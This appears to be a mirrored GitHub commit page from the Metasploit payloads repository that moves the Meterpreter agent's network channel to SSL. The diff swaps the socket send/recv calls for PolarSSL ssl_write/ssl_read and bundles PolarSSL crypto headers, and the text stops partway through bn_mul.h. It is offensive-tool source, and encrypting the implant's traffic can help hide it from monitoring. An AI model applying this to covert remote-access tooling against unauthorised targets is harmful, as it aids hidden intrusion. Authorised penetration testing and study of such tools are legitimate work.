github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Switches meterpreter to SSL by default, using the PolarSSL library. To build this, just place polarssl.lib into an workspace/common/Release/

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@6718 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2009-06-26 23:18:53 +00:00
parent 147e3d32a7
commit 3c022997cc
36 changed files with 5025 additions and 13 deletions

5
c/meterpreter/source/common/common.h

@ -10,6 +10,10 @@
#include <windows.h>
#endif
#include "polarssl/net.h"
#include "polarssl/ssl.h"
#include "polarssl/havege.h"
#include "linkage.h"
#include "args.h"
@ -21,4 +25,5 @@
#include "channel.h"
#include "scheduler.h"
#endif

18
c/meterpreter/source/common/core.c

@ -1,5 +1,8 @@
#include "common.h"
// include the PolarSSL library
#pragma comment(lib,"polarssl.lib")
DWORD packet_find_tlv_buf(PUCHAR payload, DWORD payloadLength, DWORD index,
TlvType type, Tlv *tlv);
@ -702,13 +705,13 @@ DWORD packet_transmit(Remote *remote, Packet *packet,
}
// Transmit the packet's header (length, type)
if (send(remote_get_fd(remote), (LPCSTR)&packet->header,
sizeof(packet->header), 0) == SOCKET_ERROR)
if (ssl_write(&remote->ssl, (LPCSTR)&packet->header,
sizeof(packet->header)) == SOCKET_ERROR)
break;
// Transmit the packet's payload
if (send(remote_get_fd(remote), packet->payload,
packet->payloadLength, 0) == SOCKET_ERROR)
if (ssl_write(&remote->ssl, packet->payload,
packet->payloadLength) == SOCKET_ERROR)
break;
// Destroy the packet
@ -759,10 +762,11 @@ DWORD packet_receive(Remote *remote, Packet **packet)
// Read the packet length
while (inHeader)
{
if ((bytesRead = recv(remote_get_fd(remote),
if ((bytesRead = ssl_read(&remote->ssl,
((PUCHAR)&header + headerBytes),
sizeof(TlvHeader) - headerBytes, 0)) <= 0)
{
if(bytesRead == POLARSSL_ERR_NET_TRY_AGAIN) continue;
if (!bytesRead)
SetLastError(ERROR_NOT_FOUND);
@ -796,10 +800,12 @@ DWORD packet_receive(Remote *remote, Packet **packet)
// Read the payload
while (payloadBytesLeft > 0)
{
if ((bytesRead = recv(remote_get_fd(remote),
if ((bytesRead = ssl_read(&remote->ssl,
payload + payloadLength - payloadBytesLeft,
payloadBytesLeft, 0)) <= 0)
{
if(bytesRead == POLARSSL_ERR_NET_TRY_AGAIN) continue;
if (GetLastError() == WSAEWOULDBLOCK)
continue;

123
c/meterpreter/source/common/polarssl/aes.h Normal file

@ -0,0 +1,123 @@
/**
* \file aes.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_AES_H
#define POLARSSL_AES_H
#define AES_ENCRYPT 1
#define AES_DECRYPT 0
/**
* \brief AES context structure
*/
typedef struct
{
int nr; /*!< number of rounds */
unsigned long *rk; /*!< AES round keys */
unsigned long buf[68]; /*!< unaligned data */
}
aes_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief AES key schedule (encryption)
*
* \param ctx AES context to be initialized
* \param key encryption key
* \param keysize must be 128, 192 or 256
*/
void aes_setkey_enc( aes_context *ctx, unsigned char *key, int keysize );
/**
* \brief AES key schedule (decryption)
*
* \param ctx AES context to be initialized
* \param key decryption key
* \param keysize must be 128, 192 or 256
*/
void aes_setkey_dec( aes_context *ctx, unsigned char *key, int keysize );
/**
* \brief AES-ECB block encryption/decryption
*
* \param ctx AES context
* \param mode AES_ENCRYPT or AES_DECRYPT
* \param input 16-byte input block
* \param output 16-byte output block
*/
void aes_crypt_ecb( aes_context *ctx,
int mode,
unsigned char input[16],
unsigned char output[16] );
/**
* \brief AES-CBC buffer encryption/decryption
* Length should be a multiple of the block
* size (16 bytes)
*
* \param ctx AES context
* \param mode AES_ENCRYPT or AES_DECRYPT
* \param length length of the input data
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void aes_crypt_cbc( aes_context *ctx,
int mode,
int length,
unsigned char iv[16],
unsigned char *input,
unsigned char *output );
/**
* \brief AES-CFB128 buffer encryption/decryption.
*
* \param ctx AES context
* \param mode AES_ENCRYPT or AES_DECRYPT
* \param length length of the input data
* \param iv_off offset in IV (updated after use)
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void aes_crypt_cfb128( aes_context *ctx,
int mode,
int length,
int *iv_off,
unsigned char iv[16],
unsigned char *input,
unsigned char *output );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int aes_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* aes.h */

69
c/meterpreter/source/common/polarssl/arc4.h Normal file

@ -0,0 +1,69 @@
/**
* \file arc4.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_ARC4_H
#define POLARSSL_ARC4_H
/**
* \brief ARC4 context structure
*/
typedef struct
{
int x; /*!< permutation index */
int y; /*!< permutation index */
unsigned char m[256]; /*!< permutation table */
}
arc4_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief ARC4 key schedule
*
* \param ctx ARC4 context to be initialized
* \param key the secret key
* \param keylen length of the key
*/
void arc4_setup( arc4_context *ctx, unsigned char *key, int keylen );
/**
* \brief ARC4 cipher function
*
* \param ctx ARC4 context
* \param buf buffer to be processed
* \param buflen amount of data in buf
*/
void arc4_crypt( arc4_context *ctx, unsigned char *buf, int buflen );
/*
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int arc4_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* arc4.h */

80
c/meterpreter/source/common/polarssl/base64.h Normal file

@ -0,0 +1,80 @@
/**
* \file base64.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_BASE64_H
#define POLARSSL_BASE64_H
#define POLARSSL_ERR_BASE64_BUFFER_TOO_SMALL -0x0010
#define POLARSSL_ERR_BASE64_INVALID_CHARACTER -0x0012
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Encode a buffer into base64 format
*
* \param dst destination buffer
* \param dlen size of the buffer
* \param src source buffer
* \param slen amount of data to be encoded
*
* \return 0 if successful, or POLARSSL_ERR_BASE64_BUFFER_TOO_SMALL.
* *dlen is always updated to reflect the amount
* of data that has (or would have) been written.
*
* \note Call this function with *dlen = 0 to obtain the
* required buffer size in *dlen
*/
int base64_encode( unsigned char *dst, int *dlen,
unsigned char *src, int slen );
/**
* \brief Decode a base64-formatted buffer
*
* \param dst destination buffer
* \param dlen size of the buffer
* \param src source buffer
* \param slen amount of data to be decoded
*
* \return 0 if successful, POLARSSL_ERR_BASE64_BUFFER_TOO_SMALL, or
* POLARSSL_ERR_BASE64_INVALID_DATA if the input data is not
* correct. *dlen is always updated to reflect the amount
* of data that has (or would have) been written.
*
* \note Call this function with *dlen = 0 to obtain the
* required buffer size in *dlen
*/
int base64_decode( unsigned char *dst, int *dlen,
unsigned char *src, int slen );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int base64_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* base64.h */

424
c/meterpreter/source/common/polarssl/bignum.h Normal file

@ -0,0 +1,424 @@
/**
* \file bignum.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_BIGNUM_H
#define POLARSSL_BIGNUM_H
#include <stdio.h>
#define POLARSSL_ERR_MPI_FILE_IO_ERROR -0x0002
#define POLARSSL_ERR_MPI_BAD_INPUT_DATA -0x0004
#define POLARSSL_ERR_MPI_INVALID_CHARACTER -0x0006
#define POLARSSL_ERR_MPI_BUFFER_TOO_SMALL -0x0008
#define POLARSSL_ERR_MPI_NEGATIVE_VALUE -0x000A
#define POLARSSL_ERR_MPI_DIVISION_BY_ZERO -0x000C
#define POLARSSL_ERR_MPI_NOT_ACCEPTABLE -0x000E
#define MPI_CHK(f) if( ( ret = f ) != 0 ) goto cleanup
/*
* Define the base integer type, architecture-wise
*/
#if defined(POLARSSL_HAVE_INT8)
typedef unsigned char t_int;
typedef unsigned short t_dbl;
#else
#if defined(POLARSSL_HAVE_INT16)
typedef unsigned short t_int;
typedef unsigned long t_dbl;
#else
typedef unsigned long t_int;
#if defined(_MSC_VER) && defined(_M_IX86)
typedef unsigned __int64 t_dbl;
#else
#if defined(__amd64__) || defined(__x86_64__) || \
defined(__ppc64__) || defined(__powerpc64__) || \
defined(__ia64__) || defined(__alpha__)
typedef unsigned int t_dbl __attribute__((mode(TI)));
#else
typedef unsigned long long t_dbl;
#endif
#endif
#endif
#endif
/**
* \brief MPI structure
*/
typedef struct
{
int s; /*!< integer sign */
int n; /*!< total # of limbs */
t_int *p; /*!< pointer to limbs */
}
mpi;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Initialize one or more mpi
*/
void mpi_init( mpi *X, ... );
/**
* \brief Unallocate one or more mpi
*/
void mpi_free( mpi *X, ... );
/**
* \brief Enlarge to the specified number of limbs
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_grow( mpi *X, int nblimbs );
/**
* \brief Copy the contents of Y into X
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_copy( mpi *X, mpi *Y );
/**
* \brief Swap the contents of X and Y
*/
void mpi_swap( mpi *X, mpi *Y );
/**
* \brief Set value from integer
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_lset( mpi *X, int z );
/**
* \brief Return the number of least significant bits
*/
int mpi_lsb( mpi *X );
/**
* \brief Return the number of most significant bits
*/
int mpi_msb( mpi *X );
/**
* \brief Return the total size in bytes
*/
int mpi_size( mpi *X );
/**
* \brief Import from an ASCII string
*
* \param X destination mpi
* \param radix input numeric base
* \param s null-terminated string buffer
*
* \return 0 if successful, or an POLARSSL_ERR_MPI_XXX error code
*/
int mpi_read_string( mpi *X, int radix, char *s );
/**
* \brief Export into an ASCII string
*
* \param X source mpi
* \param radix output numeric base
* \param s string buffer
* \param slen string buffer size
*
* \return 0 if successful, or an POLARSSL_ERR_MPI_XXX error code
*
* \note Call this function with *slen = 0 to obtain the
* minimum required buffer size in *slen.
*/
int mpi_write_string( mpi *X, int radix, char *s, int *slen );
/**
* \brief Read X from an opened file
*
* \param X destination mpi
* \param radix input numeric base
* \param fin input file handle
*
* \return 0 if successful, or an POLARSSL_ERR_MPI_XXX error code
*/
int mpi_read_file( mpi *X, int radix, FILE *fin );
/**
* \brief Write X into an opened file, or stdout
*
* \param p prefix, can be NULL
* \param X source mpi
* \param radix output numeric base
* \param fout output file handle
*
* \return 0 if successful, or an POLARSSL_ERR_MPI_XXX error code
*
* \note Set fout == NULL to print X on the console.
*/
int mpi_write_file( char *p, mpi *X, int radix, FILE *fout );
/**
* \brief Import X from unsigned binary data, big endian
*
* \param X destination mpi
* \param buf input buffer
* \param buflen input buffer size
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_read_binary( mpi *X, unsigned char *buf, int buflen );
/**
* \brief Export X into unsigned binary data, big endian
*
* \param X source mpi
* \param buf output buffer
* \param buflen output buffer size
*
* \return 0 if successful,
* POLARSSL_ERR_MPI_BUFFER_TOO_SMALL if buf isn't large enough
*
* \note Call this function with *buflen = 0 to obtain the
* minimum required buffer size in *buflen.
*/
int mpi_write_binary( mpi *X, unsigned char *buf, int buflen );
/**
* \brief Left-shift: X <<= count
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_shift_l( mpi *X, int count );
/**
* \brief Right-shift: X >>= count
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_shift_r( mpi *X, int count );
/**
* \brief Compare unsigned values
*
* \return 1 if |X| is greater than |Y|,
* -1 if |X| is lesser than |Y| or
* 0 if |X| is equal to |Y|
*/
int mpi_cmp_abs( mpi *X, mpi *Y );
/**
* \brief Compare signed values
*
* \return 1 if X is greater than Y,
* -1 if X is lesser than Y or
* 0 if X is equal to Y
*/
int mpi_cmp_mpi( mpi *X, mpi *Y );
/**
* \brief Compare signed values
*
* \return 1 if X is greater than z,
* -1 if X is lesser than z or
* 0 if X is equal to z
*/
int mpi_cmp_int( mpi *X, int z );
/**
* \brief Unsigned addition: X = |A| + |B|
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_add_abs( mpi *X, mpi *A, mpi *B );
/**
* \brief Unsigned substraction: X = |A| - |B|
*
* \return 0 if successful,
* POLARSSL_ERR_MPI_NEGATIVE_VALUE if B is greater than A
*/
int mpi_sub_abs( mpi *X, mpi *A, mpi *B );
/**
* \brief Signed addition: X = A + B
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_add_mpi( mpi *X, mpi *A, mpi *B );
/**
* \brief Signed substraction: X = A - B
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_sub_mpi( mpi *X, mpi *A, mpi *B );
/**
* \brief Signed addition: X = A + b
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_add_int( mpi *X, mpi *A, int b );
/**
* \brief Signed substraction: X = A - b
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_sub_int( mpi *X, mpi *A, int b );
/**
* \brief Baseline multiplication: X = A * B
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_mul_mpi( mpi *X, mpi *A, mpi *B );
/**
* \brief Baseline multiplication: X = A * b
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_mul_int( mpi *X, mpi *A, t_int b );
/**
* \brief Division by mpi: A = Q * B + R
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_DIVISION_BY_ZERO if B == 0
*
* \note Either Q or R can be NULL.
*/
int mpi_div_mpi( mpi *Q, mpi *R, mpi *A, mpi *B );
/**
* \brief Division by int: A = Q * b + R
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_DIVISION_BY_ZERO if b == 0
*
* \note Either Q or R can be NULL.
*/
int mpi_div_int( mpi *Q, mpi *R, mpi *A, int b );
/**
* \brief Modulo: R = A mod B
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_DIVISION_BY_ZERO if B == 0
*/
int mpi_mod_mpi( mpi *R, mpi *A, mpi *B );
/**
* \brief Modulo: r = A mod b
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_DIVISION_BY_ZERO if b == 0
*/
int mpi_mod_int( t_int *r, mpi *A, int b );
/**
* \brief Sliding-window exponentiation: X = A^E mod N
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_BAD_INPUT_DATA if N is negative or even
*
* \note _RR is used to avoid re-computing R*R mod N across
* multiple calls, which speeds up things a bit. It can
* be set to NULL if the extra performance is unneeded.
*/
int mpi_exp_mod( mpi *X, mpi *A, mpi *E, mpi *N, mpi *_RR );
/**
* \brief Greatest common divisor: G = gcd(A, B)
*
* \return 0 if successful,
* 1 if memory allocation failed
*/
int mpi_gcd( mpi *G, mpi *A, mpi *B );
/**
* \brief Modular inverse: X = A^-1 mod N
*
* \return 0 if successful,
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_BAD_INPUT_DATA if N is negative or nil
* POLARSSL_ERR_MPI_NOT_ACCEPTABLE if A has no inverse mod N
*/
int mpi_inv_mod( mpi *X, mpi *A, mpi *N );
/**
* \brief Miller-Rabin primality test
*
* \return 0 if successful (probably prime),
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_NOT_ACCEPTABLE if X is not prime
*/
int mpi_is_prime( mpi *X, int (*f_rng)(void *), void *p_rng );
/**
* \brief Prime number generation
*
* \param X destination mpi
* \param nbits required size of X in bits
* \param dh_flag if 1, then (X-1)/2 will be prime too
* \param f_rng RNG function
* \param p_rng RNG parameter
*
* \return 0 if successful (probably prime),
* 1 if memory allocation failed,
* POLARSSL_ERR_MPI_BAD_INPUT_DATA if nbits is < 3
*/
int mpi_gen_prime( mpi *X, int nbits, int dh_flag,
int (*f_rng)(void *), void *p_rng );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int mpi_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* bignum.h */

718
c/meterpreter/source/common/polarssl/bn_mul.h Normal file

@ -0,0 +1,718 @@
/**
* \file bn_mul.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/*
* Multiply source vector [s] with b, add result
* to destination vector [d] and set carry c.
*
* Currently supports:
*
* . IA-32 (386+) . AMD64 / EM64T
* . IA-32 (SSE2) . Motorola 68000
* . PowerPC, 32-bit . MicroBlaze
* . PowerPC, 64-bit . TriCore
* . SPARC v8 . ARM v3+
* . Alpha . MIPS32
* . C, longlong . C, generic
*/
#ifndef POLARSSL_BN_MUL_H
#define POLARSSL_BN_MUL_H
#include "polarssl/config.h"
#if defined(POLARSSL_HAVE_ASM)
#if defined(__GNUC__)
#if defined(__i386__)
#define MULADDC_INIT \
asm( "movl %%ebx, %0 " : "=m" (t)); \
asm( "movl %0, %%esi " :: "m" (s)); \
asm( "movl %0, %%edi " :: "m" (d)); \
asm( "movl %0, %%ecx " :: "m" (c)); \
asm( "movl %0, %%ebx " :: "m" (b));
#define MULADDC_CORE \
asm( "lodsl " ); \
asm( "mull %ebx " ); \
asm( "addl %ecx, %eax " ); \
asm( "adcl $0, %edx " ); \
asm( "addl (%edi), %eax " ); \
asm( "adcl $0, %edx " ); \
asm( "movl %edx, %ecx " ); \
asm( "stosl " );
#if defined(POLARSSL_HAVE_SSE2)
#define MULADDC_HUIT \
asm( "movd %ecx, %mm1 " ); \
asm( "movd %ebx, %mm0 " ); \
asm( "movd (%edi), %mm3 " ); \
asm( "paddq %mm3, %mm1 " ); \
asm( "movd (%esi), %mm2 " ); \
asm( "pmuludq %mm0, %mm2 " ); \
asm( "movd 4(%esi), %mm4 " ); \
asm( "pmuludq %mm0, %mm4 " ); \
asm( "movd 8(%esi), %mm6 " ); \
asm( "pmuludq %mm0, %mm6 " ); \
asm( "movd 12(%esi), %mm7 " ); \
asm( "pmuludq %mm0, %mm7 " ); \
asm( "paddq %mm2, %mm1 " ); \
asm( "movd 4(%edi), %mm3 " ); \
asm( "paddq %mm4, %mm3 " ); \
asm( "movd 8(%edi), %mm5 " ); \
asm( "paddq %mm6, %mm5 " ); \
asm( "movd 12(%edi), %mm4 " ); \
asm( "paddq %mm4, %mm7 " ); \
asm( "movd %mm1, (%edi) " ); \
asm( "movd 16(%esi), %mm2 " ); \
asm( "pmuludq %mm0, %mm2 " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "movd 20(%esi), %mm4 " ); \
asm( "pmuludq %mm0, %mm4 " ); \
asm( "paddq %mm3, %mm1 " ); \
asm( "movd 24(%esi), %mm6 " ); \
asm( "pmuludq %mm0, %mm6 " ); \
asm( "movd %mm1, 4(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "movd 28(%esi), %mm3 " ); \
asm( "pmuludq %mm0, %mm3 " ); \
asm( "paddq %mm5, %mm1 " ); \
asm( "movd 16(%edi), %mm5 " ); \
asm( "paddq %mm5, %mm2 " ); \
asm( "movd %mm1, 8(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "paddq %mm7, %mm1 " ); \
asm( "movd 20(%edi), %mm5 " ); \
asm( "paddq %mm5, %mm4 " ); \
asm( "movd %mm1, 12(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "paddq %mm2, %mm1 " ); \
asm( "movd 24(%edi), %mm5 " ); \
asm( "paddq %mm5, %mm6 " ); \
asm( "movd %mm1, 16(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "paddq %mm4, %mm1 " ); \
asm( "movd 28(%edi), %mm5 " ); \
asm( "paddq %mm5, %mm3 " ); \
asm( "movd %mm1, 20(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "paddq %mm6, %mm1 " ); \
asm( "movd %mm1, 24(%edi) " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "paddq %mm3, %mm1 " ); \
asm( "movd %mm1, 28(%edi) " ); \
asm( "addl $32, %edi " ); \
asm( "addl $32, %esi " ); \
asm( "psrlq $32, %mm1 " ); \
asm( "movd %mm1, %ecx " );
#define MULADDC_STOP \
asm( "emms " ); \
asm( "movl %0, %%ebx " :: "m" (t)); \
asm( "movl %%ecx, %0 " : "=m" (c)); \
asm( "movl %%edi, %0 " : "=m" (d)); \
asm( "movl %%esi, %0 " : "=m" (s) :: \
"eax", "ecx", "edx", "esi", "edi" );
#else
#define MULADDC_STOP \
asm( "movl %0, %%ebx " :: "m" (t)); \
asm( "movl %%ecx, %0 " : "=m" (c)); \
asm( "movl %%edi, %0 " : "=m" (d)); \
asm( "movl %%esi, %0 " : "=m" (s) :: \
"eax", "ecx", "edx", "esi", "edi" );
#endif /* SSE2 */
#endif /* i386 */
#if defined(__amd64__) || defined (__x86_64__)
#define MULADDC_INIT \
asm( "movq %0, %%rsi " :: "m" (s)); \
asm( "movq %0, %%rdi " :: "m" (d)); \
asm( "movq %0, %%rcx " :: "m" (c)); \
asm( "movq %0, %%rbx " :: "m" (b)); \
asm( "xorq %r8, %r8 " );
#define MULADDC_CORE \
asm( "movq (%rsi),%rax " ); \
asm( "mulq %rbx " ); \
asm( "addq $8, %rsi " ); \
asm( "addq %rcx, %rax " ); \
asm( "movq %r8, %rcx " ); \
asm( "adcq $0, %rdx " ); \
asm( "nop " ); \
asm( "addq %rax, (%rdi) " ); \
asm( "adcq %rdx, %rcx " ); \
asm( "addq $8, %rdi " );
#define MULADDC_STOP \
asm( "movq %%rcx, %0 " : "=m" (c)); \
asm( "movq %%rdi, %0 " : "=m" (d)); \
asm( "movq %%rsi, %0 " : "=m" (s) :: \
"rax", "rcx", "rdx", "rbx", "rsi", "rdi", "r8" );
#endif /* AMD64 */
#if defined(__mc68020__) || defined(__mcpu32__)
#define MULADDC_INIT \
asm( "movl %0, %%a2 " :: "m" (s)); \
asm( "movl %0, %%a3 " :: "m" (d)); \
asm( "movl %0, %%d3 " :: "m" (c)); \
asm( "movl %0, %%d2 " :: "m" (b)); \
asm( "moveq #0, %d0 " );
#define MULADDC_CORE \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d4:%d1 " ); \
asm( "addl %d3, %d1 " ); \
asm( "addxl %d0, %d4 " ); \
asm( "moveq #0, %d3 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "addxl %d4, %d3 " );
#define MULADDC_STOP \
asm( "movl %%d3, %0 " : "=m" (c)); \
asm( "movl %%a3, %0 " : "=m" (d)); \
asm( "movl %%a2, %0 " : "=m" (s) :: \
"d0", "d1", "d2", "d3", "d4", "a2", "a3" );
#define MULADDC_HUIT \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d4:%d1 " ); \
asm( "addxl %d3, %d1 " ); \
asm( "addxl %d0, %d4 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d3:%d1 " ); \
asm( "addxl %d4, %d1 " ); \
asm( "addxl %d0, %d3 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d4:%d1 " ); \
asm( "addxl %d3, %d1 " ); \
asm( "addxl %d0, %d4 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d3:%d1 " ); \
asm( "addxl %d4, %d1 " ); \
asm( "addxl %d0, %d3 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d4:%d1 " ); \
asm( "addxl %d3, %d1 " ); \
asm( "addxl %d0, %d4 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d3:%d1 " ); \
asm( "addxl %d4, %d1 " ); \
asm( "addxl %d0, %d3 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d4:%d1 " ); \
asm( "addxl %d3, %d1 " ); \
asm( "addxl %d0, %d4 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "movel %a2@+, %d1 " ); \
asm( "mulul %d2, %d3:%d1 " ); \
asm( "addxl %d4, %d1 " ); \
asm( "addxl %d0, %d3 " ); \
asm( "addl %d1, %a3@+ " ); \
asm( "addxl %d0, %d3 " );
#endif /* MC68000 */
#if defined(__powerpc__) || defined(__ppc__)
#if defined(__powerpc64__) || defined(__ppc64__)
#if defined(__MACH__) && defined(__APPLE__)
#define MULADDC_INIT \
asm( "ld r3, %0 " :: "m" (s)); \
asm( "ld r4, %0 " :: "m" (d)); \
asm( "ld r5, %0 " :: "m" (c)); \
asm( "ld r6, %0 " :: "m" (b)); \
asm( "addi r3, r3, -8 " ); \
asm( "addi r4, r4, -8 " ); \
asm( "addic r5, r5, 0 " );
#define MULADDC_CORE \
asm( "ldu r7, 8(r3) " ); \
asm( "mulld r8, r7, r6 " ); \
asm( "mulhdu r9, r7, r6 " ); \
asm( "adde r8, r8, r5 " ); \
asm( "ld r7, 8(r4) " ); \
asm( "addze r5, r9 " ); \
asm( "addc r8, r8, r7 " ); \
asm( "stdu r8, 8(r4) " );
#define MULADDC_STOP \
asm( "addze r5, r5 " ); \
asm( "addi r4, r4, 8 " ); \
asm( "addi r3, r3, 8 " ); \
asm( "std r5, %0 " : "=m" (c)); \
asm( "std r4, %0 " : "=m" (d)); \
asm( "std r3, %0 " : "=m" (s) :: \
"r3", "r4", "r5", "r6", "r7", "r8", "r9" );
#else
#define MULADDC_INIT \
asm( "ld %%r3, %0 " :: "m" (s)); \
asm( "ld %%r4, %0 " :: "m" (d)); \
asm( "ld %%r5, %0 " :: "m" (c)); \
asm( "ld %%r6, %0 " :: "m" (b)); \
asm( "addi %r3, %r3, -8 " ); \
asm( "addi %r4, %r4, -8 " ); \
asm( "addic %r5, %r5, 0 " );
#define MULADDC_CORE \
asm( "ldu %r7, 8(%r3) " ); \
asm( "mulld %r8, %r7, %r6 " ); \
asm( "mulhdu %r9, %r7, %r6 " ); \
asm( "adde %r8, %r8, %r5 " ); \
asm( "ld %r7, 8(%r4) " ); \
asm( "addze %r5, %r9 " ); \
asm( "addc %r8, %r8, %r7 " ); \
asm( "stdu %r8, 8(%r4) " );
#define MULADDC_STOP \
asm( "addze %r5, %r5 " ); \
asm( "addi %r4, %r4, 8 " ); \
asm( "addi %r3, %r3, 8 " ); \
asm( "std %%r5, %0 " : "=m" (c)); \
asm( "std %%r4, %0 " : "=m" (d)); \
asm( "std %%r3, %0 " : "=m" (s) :: \
